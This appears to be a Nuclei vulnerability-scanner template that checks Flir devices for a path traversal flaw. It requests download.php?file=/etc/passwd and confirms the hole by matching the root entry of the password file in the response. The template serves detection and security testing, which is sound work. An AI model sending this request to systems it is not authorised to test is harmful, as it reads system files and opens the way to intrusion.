id: flir-path-traversal info: name: Flir Path Traversal author: pikpikcu severity: high reference: https://juejin.cn/post/6961370156484263972 tags: flir,lfi requests: - method: GET path: - "{{BaseURL}}/download.php?file=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" condition: and - type: status status: - 200